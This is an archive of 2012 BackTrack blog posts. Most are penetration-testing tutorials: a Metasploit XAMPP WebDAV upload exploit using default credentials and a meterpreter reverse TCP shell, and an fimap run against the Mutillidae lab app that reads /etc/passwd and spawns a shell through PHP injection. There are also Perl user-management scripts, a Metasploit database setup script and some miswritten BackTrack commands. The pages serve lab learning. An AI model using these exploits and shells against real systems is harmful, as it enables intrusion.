Archiwum

Archive for the ‘Back Track 5’ Category

Exploit XMAPP With Metasploit Framework

Czerwiec 29, 2012 1 komentarz

XMAPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

The distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

xampp_for_win

XAMPP For Windows

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf >use exploit(xampp_webdav_upload_php)

msf>set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf  exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

xampp exploit

Xampp Exploit

We’re home.

Source:

How To Completely Remove User Account In Unix (Linux)

Czerwiec 28, 2012 Dodaj komentarz

How do I remove a user’s access from my server? How do I delete a user account under Linux operating systems?

You need to use the userdel command to delete a user account and related files from user account or use this perl script:

/#!/usr/bin/perl
use strict;
use warnings;
use Fcntl ':flock'; # import LOCK_* constants

if ($#ARGV != 0) {
print STDERR "Usage is $0 <user>\n";
exit (8);
}

my $user = $ARGV[0];

sub edit_file($)
{
my $file = shift;

open IN_FILE, "<$file" or
die("Could not open $file for input");

open OUT_FILE, ">$file.new" or
die("Could not open $file.new for output");

while (1) {
my $line = <IN_FILE>;
if (not defined($line)) {
last;
}
if ($line =~ /^$user/) {
next;
}
print OUT_FILE $line;
}
close (IN_FILE);
close (OUT_FILE);
unlink("$file.bak");
rename("$file", "$file.bak");
rename("$file.new", $file);
}

my @info = getpwnam($user);
if (@info == -1) {
die("No such user $user");
}

open PW_FILE, "</etc/passwd" or
die("Could not read /etc/passwd");

# Lock the file for the duration of the program
flock PW_FILE, LOCK_EX;

edit_file("/etc/group");
edit_file("/etc/shadow");

if ($info[7] eq "/home/$user") {
system("rm -rf /home/$user");
} else {
print "User has a non-standard home directory.\n";
print "Please remove manually.\n";
print "Directory = $info[7]\n";
}
print "User $user -- Deleted\n";

edit_file("/etc/passwd");

flock(PW_FILE,LOCK_UN);
close(PW_FILE);</p>

This script  must be run as root user.

Running the script


root@bt:~/src/perl# ./del_user_a.pl
Usage is ./del_user_a.pl <user>
root@bt:~/src/perl# ./del_user_a.pl wysocand

Running On BackTrack 5R2
perl_del_user

 

Source:

Kategorie:Back Track 5, Perl Tagi: ,

How To Automatically Create User Accounts in Unix ( Linux )

Czerwiec 27, 2012 1 komentarz

The simplest way to automatically  add a new user to your system is to do run a Perl script  like this:


#!/usr/bin/perl
 use strict;
 use warnings;
 use Fcntl ':flock'; # import LOCK_* constants

# The file we are going to change (Testing on Back Track 5R2)

my $pw_file = "/etc/passwd";
 my $group_file = "/etc/group";
 my $shadow_file = "/etc/shadow";

# Login name
 my $login;    # Login name
 print "Login: ";
 $login = <STDIN>;
 chomp($login);

if ($login !~ /[A-Z_a-z0-9]+/) {
 die("No login specified");
 }

open PW_FILE, "<$pw_file" or die("Could not read $pw_file");
 # Lock the file for the duration of the program
 flock PW_FILE, LOCK_EX;

# Check login info.
 my $check_uid = getpwnam($login);
 if (defined($check_uid)) {
 print "$login already exists\n";
 exit (8);
 }

# Find the highest UID.  We'll be that +1
 my @pw_info = <PW_FILE>;

my $uid = 0;    # UID for the user

# Find biggest user
 foreach my $cur_pw (@pw_info) {
 my @fields = split /:/, $cur_pw;
 if ($fields[2] > 60000) {
 next;
 }
 if ($fields[2] > $uid) {
 $uid = $fields[2];
 }
 }
 $uid++;

# Each user get his own group.
 my $gid = $uid;

# Default home dir.
 my $home_dir = "/home/$login";

print "Full Name: "; # Get user full name
 my $full_name = <STDIN>;
 chomp($full_name);

my $shell = "";    # Get user shell to use
 while (! -f $shell) {
 print "Shell: ";
 $shell = <STDIN>;
 chomp($shell);
 }

print "Setting up account for: $login [$full_name]\n";

open PW_FILE, ">>$pw_file" or
 die("Could not append to $pw_file");
 print PW_FILE
 "${login}:x:${uid}:${gid}:${full_name}:${home_dir}:$shell\n";

open GROUP_FILE, ">>$group_file" or
 die("Could not append to $group_file");
 print GROUP_FILE "${login}:x:${gid}:$login\n";
 close GROUP_FILE;

open SHADOW, ">>$shadow_file" or
 die("Could not append to $shadow_file");
 print SHADOW "${login}:*:11647:0:99999:7:::\n";
 close SHADOW;

# Create the home directory
 mkdir($home_dir);
 chmod(0755, $home_dir);
 system("cp -R /etc/skel/.[a-zA-Z]* $home_dir");
 system("find $home_dir -print ".
 "-exec chown ${login}:${login} {} \\;");

# Set the password for the user
 print "Setting password\n";
 system("passwd $login");

flock(PW_FILE,LOCK_UN);
 close(PW_FILE);

How It Work:

  • Lock the /etc/passwd file
  • Get the user name
  • Lock the password file
  • Make sure the user doesn’t exist
  • Genarate a user ID for the new user
  • Create an entry in /etc/passwd
  • Create an entry in /etc/shadow
  • Create an entry in /etc/groups
  • Create the user home directory
  • Set the initial password for new user
  • Unlock the /etc/passwd file

Example on BackTrack Linux:

add user

Add New User

And:

Add New User

Add New User

 

Source:

1.Perl for System Administration.http://docstore.mik.ua/orelly/perl/sysadmin/index.htm

 

Kategorie:Back Track 5, Perl

Perl – OnLine Library

Czerwiec 27, 2012 Dodaj komentarz
  1. HTMLified Perl 5 Reference Guide – http://www.oopweb.com/Perl/Documents/Perl5Ref/VolumeFrames.html
  2. Perl 5 Documentation – http://www.oopweb.com/Perl/Documents/PerlDoc/VolumeFrames.html
  3. Perl for Perl Newbies – http://www.oopweb.com/Perl/Documents/P4PNewbies/VolumeFrames.html
  4. Perl for Win32 FAQ – http://www.oopweb.com/Perl/Documents/PerlWin32/VolumeFrames.html
  5. Beginning Perl – http://www.perl.org/books/beginning-perl/
  6. Impatient Perl – http://www.perl.org/books/impatient-perl/
  7. Extreme Perl – http://www.extremeperl.org/bk/home
  8. MacPerl: Power & Ease – http://macperl.com/ptf_book/r/MP/i2.html
  9. Embedding Perl in HTML with Mason – http://www.masonbook.com
  10. Perl for the Web – http://www.globalspin.com/thebook/
  11. Web Client Programming with Perl – http://www.oreilly.com/openbook/webclient/
  12. Perl 5 By Example – http://www.computer-books.us/perl_0010.php
  13. An Introduction to Perl – http://www.linuxtopia.org/Perl_Tutorial/index.html
  14. Beginning CGI Programming with Perl – http://www.learnthat.com/internet/learn-160-cgi_programming_perl.htm
  15. Perl Tutorial: Start – http://www.comp.leeds.ac.uk/Perl/start.html
  16. A Perl Tutorial – http://www.civeng.carleton.ca/Courses/Grad/1995-96/82.562/perl/
  17. Robert’s Perl Tutorial – http://www.sthomas.net/oldpages/roberts-perl-tutorial.htm
  18. Beginning Perl Tutorials – http://www.pageresource.com/cgirec/index2.htm
  19. Beginner’s Guide to CGI Scripting with Perl – http://www.lies.com/begperl/
  20. Practical Perl Programming – http://www.cs.cf.ac.uk/Dave/PERL/
  21. Perl 5 Unleashed – http://octopus.cdut.edu.cn/~yf17/perl5/
  22. Perl for System Administration – http://www.unix.org.ua/orelly/perl/sysadmin/index.htm
  23. PERL — Practical Extraction and Report Language – http://www-cgi.cs.cmu.edu/cgi-bin/perl-man
  24. Programming Perl – http://www.unix.org.ua/orelly/perl/prog3/
  25. Steve Litt’s Perls of Wisdom – http://www.troubleshooters.com/codecorn/littperl/index.htm
  26. Perl Regular Expression Tutorial – http://virtual.park.uga.edu/humcomp/perl/regex2a.html
  27. Perl Documentation – http://www.perl.com/pub/q/documentation
  28. Programming Perl 5 – http://www.squirrel.nl/pub/perlref-5.004.1.pdf
  29. Beginner’s Introduction to Perl – http://www.perl.com/pub/a/2000/10/begperl1.html
  30. Perl in a Nutshell – http://www.unix.org.ua/orelly/perl/perlnut/index.htm
  31. Programming Perl, 3rd Edition – http://www.unix.org.ua/orelly/perl/prog3/index.htm
  32. Advanced Perl Programming – http://www.unix.org.ua/orelly/perl/advprog/index.htm
  33. Perl Cookbook – http://www.unix.org.ua/orelly/perl/cookbook/index.htm
  34. XML processing with Perl – http://www.xmltwig.com/tutorial/perl_xml/mtb04_01.html
Kategorie:Back Track 5, Perl

FIMAP – LFI/RFI Auditing Tool.

Czerwiec 26, 2012 Dodaj komentarz

FIMAP:

Fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable.

The goal of fimap is to improve the quality and security of your website.

Do not use this tool on servers where you don’t have permission to pentest!

Fimap is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.

How to use:

fimap.py [Options]

[Options]

  •  -h – Help
  •  -u [URL] – URL to scan
  •  -m – Mass scan
  •  -l [filename] – List of URLs for mass scan
  •  -g – Perform Google search to find URLs
  •  -q – Google search query
  •  -H – Harvests a URL recursively for additional URLs to scan
  •  -w [filename] – Write URL list for mass scan
  •  -b – Enables blind testing where errors are not reported by the web application
  •  -x – Exploit vulnerabilities

Output:
Scans target URL(s) for RFI/LFI bugs and, optionally, allows you to exploit any discovered vulnerabilities.

Mutillidae Web App -Metasploitable 2 LFI/RFI Auditing

Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver. It is already installed on Samurai WTF and Rapid7 Metasploitable-2. The existing version can be updated on either. NOWASP (Mutillidae) contains dozens of vulns and hints to help the user; providing an easy-to-use web hacking environment deliberately designed to be used as a lab for security enthusiast, classrooms, labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an „assess the assessor” target for vulnerability assessment software.


c:\Python25\fimap_alpha_v09>python fimap.py -u "http://192.168.235.129/mutillidae/index.php?page=user-info.php"

c:\Python25\fimap_alpha_v09>python fimap.py -u „http://192.168.235.129/mutillidae/index.php?page=user-info.php&#8221;
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: ‚http://192.168.235.129/mutillidae/index.php?page=use
r-info.php’
[16:05:56] [OUT] Inspecting URL ‚http://192.168.235.129/mutillidae/index.php?pag
e=user-info.php’…
[16:05:56] [INFO] Fiddling around with URL…
[16:05:56] [OUT] [PHP] Possible file inclusion found! -> ‚http://192.168.235.129
/mutillidae/index.php?page=FmQXBJP2’ with Parameter ‚page’.
[16:05:56] [OUT] [PHP] Identifying Vulnerability ‚http://192.168.235.129/mutilli
dae/index.php?page=user-info.php’ with Parameter ‚page’…
[16:05:56] [INFO] Scriptpath received: ‚/var/www/mutillidae’
[16:05:56] [INFO] Operating System is ‚Unix-Like’.
[16:05:56] [INFO] Testing file ‚/etc/passwd’…
[16:05:57] [INFO] Testing file ‚/proc/self/environ’…
[16:05:57] [INFO] Testing file ‚php://input’…
[16:05:57] [INFO] Testing file ‚/var/log/apache2/access.log’…
[16:05:57] [INFO] Testing file ‚/var/log/apache/access.log’…
[16:05:57] [INFO] Testing file ‚/var/log/httpd/access.log’…
[16:05:58] [INFO] Testing file ‚/var/log/apache2/access_log’…
[16:05:58] [INFO] Testing file ‚/var/log/apache/access_log’…
[16:05:58] [INFO] Testing file ‚/var/log/httpd/access_log’…
[16:05:58] [INFO] Testing file ‚http://www.phpbb.de/index.php’…
###########################################################
#[1] Possible PHP-File Inclusion
#
###########################################################
#::REQUEST
#  [URL]        http://192.168.235.129/mutillidae/index.php?page=user-info.php
#  [HEAD SENT]
#::VULN INFO
#  [GET PARAM]  page
#  [PATH]       /var/www/mutillidae
#  [OS]         Unix
#  [TYPE]       Absolute Clean
#  [TRUNCATION] No Need. It’s clean.
#  [READABLE FILES]
#                   [0] /etc/passwd
#                   [1] /proc/self/environ
########################################################################

This information can be used to further exploit the vulnerable system either manually or with another tool. On the other hand,we can also use fimap’s internal attack features by adding a “-x” parameter to the command line.

c:\Python25\fimap_alpha_v09>python fimap.py -x

c:\Python25\fimap_alpha_v09>python fimap.py -x
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###################################################
#:: List of Domains ::                            #
###################################################
#[1] 192.168.235.129                              #
#[ ] And 0 hosts with no valid attack vectors.    #
#[q] Quit                                         #
#######################################################
Choose Domain: 1
#######################################################
#:: FI Bugs on ‚192.168.235.129’ ::
#
######################################################
#[1] URL: ‚/mutillidae/index.php?page=user-info.php’ injecting file: ‚/proc/self
/environ’ using GET-param: ‚page’    #
#[q] Quit

#####################################################
Choose vulnerable script: 1
[16:17:49] [INFO] Testing PHP-code injection thru User-Agent…
[16:17:49] [OUT] PHP Injection works! Testing if execution works…
[16:17:49] [INFO] Testing execution thru ‚popen[b64]’…
[16:17:49] [OUT] Execution thru ‚popen[b64]’ works!
####################################################
#:: Available Attacks – PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey’s reverse shell           #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait – Setting up shell (one request)…
——————————————-
Welcome to fimap shell!
Better don’t start interactive commands! 😉
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter ‚q’ to exit the shell.
——————————————-
fishell@www-data:/var/www/mutillidae$> who

We can see:

Fimap

Fimap at work

Installing Metasploit Framework + PostgreSQL Under VMware BackTrack 5

Czerwiec 1, 2012 Dodaj komentarz
Installing Metasploit Framework + PostgreSQL Under VMware BackTrack 5

I’ve just installed the new and improved BackTrack 5 in VMware. As always, i made an apt-get update && apt-get dist-upgrade -y and after that a msfupdate.I launched Metasploit framework, and was about to start postgresql when i realized that BT 5 is with MySQL.

I created a workaround script, its not pretty but it works. You will need the following packages installed before running the script:

apt-get install postgresql-client libpq-dev

Copy the script into a file e.g script.sh,

chmod +x script.sh, ./script.sh

The commands (script.sh ) I used was:

#!/bin/sh

## Kill database process
echo "Killing database process .."
kill $(pgrep postgres) > /dev/null 2>&1

## replace the md5 auth with trust for local ipv4 connections
echo "Allowing all local IPV4 connections .."
cp /opt/framework3/postgresql/data/pg_hba.conf /opt/framework3/postgresql/data/pg_hba.conf.bak
cat /opt/framework3/postgresql/data/pg_hba.conf | sed -e 's/host all all 127.0.0.1\/32 md5/host all all 127.0.0.1\/32 trust/' > /opt/framework3/postgresql/data/tmp.conf
mv /opt/framework3/postgresql/data/tmp.conf /opt/framework3/postgresql/data/pg_hba.conf

## restart postgres server (only necessary during this process, on reboot it will start automatically)
echo "Restarting postgres server (only necessary during this process, on reboot it will start automatically) .."
su postgres -c "/opt/framework3/postgresql/bin/postgres -D /opt/framework3/postgresql/data -p 7175 &"
# wait for server to start
sleep 5

## Now we can access via psql we can change user for database
echo "Changing postgres user postgres's password to 'postgres_password' .."
su postgres -c "psql -h 127.0.0.1 -p 7175 -c \"ALTER USER postgres WITH PASSWORD 'postgres_password'\";" > /dev/null 2>&1

## Create a database for usage with msf
echo "Creating database 'msf_db' for use with metasploit .."
su postgres -c "psql -h 127.0.0.1 -p 7175 -c \"CREATE DATABASE msf_db\";" > /dev/null 2>&1

## change back to md5 auth
echo "Changing back to md5 auth .."
cat /opt/framework3/postgresql/data/pg_hba.conf | sed -e 's/host all all 127.0.0.1\/32 trust/host all all 127.0.0.1\/32 md5/' > /opt/framework3/postgresql/data/tmp.conf
mv /opt/framework3/postgresql/data/tmp.conf /opt/framework3/postgresql/data/pg_hba.conf

###############################

## msfconsole

## change ruby version
echo "##################################"
echo "Changing Ruby version - please choose the '0' option .."
echo "##################################"
update-alternatives --config ruby

## install postgres gem
gem install postgres

# go into msfconsole and choose the db_driver
echo "Updating msf .."
/opt/framework3/msf3/msfupdate

echo
echo "#################################################"
echo "starting msfconsole .."
echo "#################################################"

/opt/framework3/msf3/msfconsole
Result of the script

root@bt:/opt/framework3# ./script.sh
Killing database process ..
Allowing all local IPV4 connections ..
Restarting postgres server (only necessary during this process, on reboot it will start automatically) ..
FATAL:  bogus data in lock file „postmaster.pid”: „”
Changing postgres user postgres’s password to ‚postgres_password’ ..
Creating database ‚msf_db’ for use with metasploit ..
Changing back to md5 auth ..
##################################
Changing Ruby version – please choose the ‚0’ option ..
##################################
There are 2 choices for the alternative ruby (providing /usr/bin/ruby).

  Selection    Path                Priority   Status
————————————————————
  0            /usr/bin/ruby1.8     500       auto mode
  1            /usr/bin/ruby1.8     500       manual mode
* 2            /usr/bin/ruby1.9.2   400       manual mode

Press enter to keep the current choice[*], or type selection number: 0
update-alternatives: using /usr/bin/ruby1.8 to provide /usr/bin/ruby (ruby) in auto mode.
Building native extensions.  This could take a while…
—————————————————————————

This is an old, deprecated version of the Ruby PostgreSQL driver that hasn’t
been maintained or supported since early 2008.

You should install/require ‚pg’ instead.

If you need the ‚postgres’ gem for legacy code that can’t be converted, you can
still install it using an explicit version, like so:

  gem install postgres -v ‚0.7.9.2008.01.28’
  gem uninstall postgres -v ‚>0.7.9.2008.01.28’

If you have any questions, the nice folks in the Google group can help:

  http://goo.gl/OjOPP / ruby-pg@googlegroups.com

—————————————————————————
Successfully installed pg-0.13.2
Successfully installed postgres-0.8.1
2 gems installed
Installing ri documentation for pg-0.13.2…

Enclosing class/module ‚rb_mPG’ for class Connection not known

Enclosing class/module ‚rb_mPG’ for class Result not known
Installing ri documentation for postgres-0.8.1…
Installing RDoc documentation for pg-0.13.2…

Enclosing class/module ‚rb_mPG’ for class Connection not known

Enclosing class/module ‚rb_mPG’ for class Result not known
Installing RDoc documentation for postgres-0.8.1…
Updating msf ..
[*]
[*] Attempting to update the Metasploit Framework…
[*]

A    external/source/armitage
A    external/source/armitage/lib
A    external/source/armitage/lib/postgresql-9.1-901.jdbc4.jar
A    external/source/armitage/lib/sleep.jar
A    external/source/armitage/lib/msgpack-0.5.1-devel.jar
A    external/source/armitage/lib/jgraphx.jar
A    external/source/armitage/scripts
A    external/source/armitage/scripts/tokens.sl
A    external/source/armitage/scripts/server.sl
A    external/source/armitage/scripts/shell.sl
A    external/source/armitage/scripts/modules.sl
A    external/source/armitage/scripts/targets.sl

………………………………………………………………..

##################################################
starting msfconsole ..
##################################################

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo…
the matrix has you
follow the white rabbit.

knock, knock, Neo.

(`.         ,-,
` `.    ,;’ /
`.  ,’/ .’
`. X /.’
.-;–”–.._` ` (
.’            /   `
,           ` ‚   Q ‚
,         ,   `._    \
,.|         ‚     `-.;_’
:  . `  ;    `  ` –,.._;
‚ `    ,   )   .’
`._ ,  ‚   /_
; ,”-,;’ „-
„-..__„–`

=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ — –=[ 843 exploits – 471 auxiliary – 142 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
=[ svn r15247 updated 5 days ago (2012.05.03)

msf > db_status
[*] postgresql selected, no connection
msf > db_connect postgres:postgres_password@127.0.0.1:7175/msf_db

msf > db_status
[*] postgresql connected to msf_db

VMware – Back Track 5 Start Up

Maj 29, 2012 3 komentarze

Back Track 5 Start  Up

  • Power on/start up Backtrack
  • log in with the default user name and password ( user root, password toor)

root@bt~#

  • start x (the windows gUi)

root@bt~# startx

  • View all the network interfaces on your machine

root@bt~# ifconfig  -a

  • turn up (on) the desired network interface

root@bt~#eth0  ifconfig up

  • Assign an iP address manually

root@bt~# eth0 ifconfig up 192.168.0.1

  • View the manually assigned iP address

root@bt~# ifconfig

  • Assign an iP address through dHcP

root@bt~# dhclient eth0

  • View the dynamically assigned address

root@bt~# ifconfig

  • reboot the machine using the command line interface

root@bt~# reboot

  • Poweroff the machine using the command line interface

root@bt~# poweroff

StartUp.sh


#!/bin/bash

echo "Setting up the victim machine, this will take just a moment..."

ifconfig eth0 down

ifconfig eth0 172.16.45.$((( $RANDOM %254)  1)) up

# uncomment the following lines by removing the #, to start up services on your victim

# please note, you may need to change the location / path depending on your distro

/etc/init.d/ssh start

# note, you may have to generate your SSH key using sshd-generate

/etc/init.d/apache2 start

/etc/init.d/atftpd start

echo "This victim machine is now setup."

echo "The IP address is somewhere in the 172.16.45.0/24 network."

echo "You may now close this window and begin your attack...Good  luck!"

Kategorie:Back Track 5